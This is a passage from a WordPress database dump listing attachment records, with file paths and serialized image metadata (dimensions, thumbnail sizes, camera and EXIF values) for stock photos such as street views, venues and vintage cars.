"file\";s:20:\"ventolin-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"ventolin-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DMC-FZ1000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.12\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(312,126,'_wp_attached_file','2017/10/venue-events-food.jpg'),(313,126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:638;s:4:\"file\";s:29:\"2017/10/venue-events-food.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"venue-events-food-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"venue-events-food-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"venue-events-food-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(314,127,'_wp_attached_file','2017/10/venue-finder.png'),(315,127,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:67;s:4:\"file\";s:24:\"2017/10/venue-finder.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"venue-finder-150x67.png\";s:5:\"width\";i:150;s:6:\"height\";i:67;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"venue-finder-300x57.png\";s:5:\"width\";i:300;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(316,128,'_wp_attached_file','2017/10/vericlean-logo.png'),(317,128,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:189;s:6:\"height\";i:54;s:4:\"file\";s:26:\"2017/10/vericlean-logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"vericlean-logo-150x54.png\";s:5:\"width\";i:150;s:6:\"height\";i:54;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(318,129,'_wp_attached_file','2017/10/video-production.jpg'),(319,129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:28:\"2017/10/video-production.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"video-production-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"video-production-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"video-production-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"38\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(320,130,'_wp_attached_file','2017/10/view-of-liverpool.jpg'),(321,130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:29:\"2017/10/view-of-liverpool.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"view-of-liverpool-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"view-of-liverpool-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"view-of-liverpool-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"18\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS 1200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"36\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(322,131,'_wp_attached_file','2017/10/view-of-london.jpg'),(323,131,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:26:\"2017/10/view-of-london.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"view-of-london-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"view-of-london-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"view-of-london-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 6s\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"25\";s:13:\"shutter_speed\";s:18:\"0.0008695652173913\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(324,132,'_wp_attached_file','2017/10/view-of-wind-turbines.jpg'),(325,132,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:538;s:4:\"file\";s:33:\"2017/10/view-of-wind-turbines.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"view-of-wind-turbines-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"view-of-wind-turbines-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"view-of-wind-turbines-768x430.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(326,133,'_wp_attached_file','2017/10/view-through-phone.jpg'),(327,133,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:30:\"2017/10/view-through-phone.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"view-through-phone-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"view-through-phone-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"view-through-phone-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(328,134,'_wp_attached_file','2017/10/villa.jpg'),(329,134,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:642;s:4:\"file\";s:17:\"2017/10/villa.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"villa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"villa-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"villa-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D200\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(330,135,'_wp_attached_file','2017/10/vinatge-car.jpg'),(331,135,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:660;s:4:\"file\";s:23:\"2017/10/vinatge-car.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"vinatge-car-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"vinatge-car-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"vinatge-car-768x528.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:528;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(332,136,'_wp_attached_file','2017/10/vinatge.jpg'),(333,136,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:924;s:6:\"height\";i:720;s:4:\"file\";s:19:\"2017/10/vinatge.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"vinatge-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"vinatge-300x234.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"vinatge-768x598.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:598;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(334,137,'_wp_attached_file','2017/10/vintage-restaurant.jpg'),(335,137,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:30:\"2017/10/vintage-restaurant.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"vintage-restaurant-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"vintage-restaurant-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"vintage-restaurant-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.7\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"LEICA Q (Typ 116)\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"28\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(336,138,'_wp_attached_file','2017/10/visual-art.jpg'),(337,138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:657;s:4:\"file\";s:22:\"2017/10/visual-art.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"visual-art-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"visual-art-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"visual-art-768x526.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:526;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(338,139,'_wp_attached_file','2017/10/voiceover-mic.jpg'),(339,139,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/voiceover-mic.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"voiceover-mic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"voiceover-mic-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"voiceover-mic-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"NX300\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(340,140,'_wp_attached_file','2017/10/volume-keys.jpg'),(341,140,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:23:\"2017/10/volume-keys.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"volume-keys-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"volume-keys-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"volume-keys-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(342,141,'_wp_attached_file','2017/10/volunteer.jpg'),(343,141,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:21:\"2017/10/volunteer.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"volunteer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"volunteer-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"volunteer-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(344,142,'_wp_attached_file','2017/10/voting.jpg'),(345,142,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:18:\"2017/10/voting.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"voting-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"voting-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"voting-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(346,143,'_wp_attached_file','2017/10/waiting-for-transport.jpg'),(347,143,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:33:\"2017/10/waiting-for-transport.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"waiting-for-transport-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"waiting-for-transport-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"waiting-for-transport-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(348,144,'_wp_attached_file','2017/10/walking-shoes.jpg'),(349,144,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/walking-shoes.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"walking-shoes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"walking-shoes-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"walking-shoes-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(350,145,'_wp_attached_file','2017/10/walking-to-work.jpg'),(351,145,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:27:\"2017/10/walking-to-work.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"walking-to-work-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"walking-to-work-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"walking-to-work-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D750\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(352,146,'_wp_attached_file','2017/10/Wall-light.jpg'),(353,146,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:720;s:4:\"file\";s:22:\"2017/10/Wall-light.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Wall-light-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Wall-light-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(354,147,'_wp_attached_file','2017/10/wallet-and-pocket.jpg'),(355,147,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:29:\"2017/10/wallet-and-pocket.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"wallet-and-pocket-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"wallet-and-pocket-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"wallet-and-pocket-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"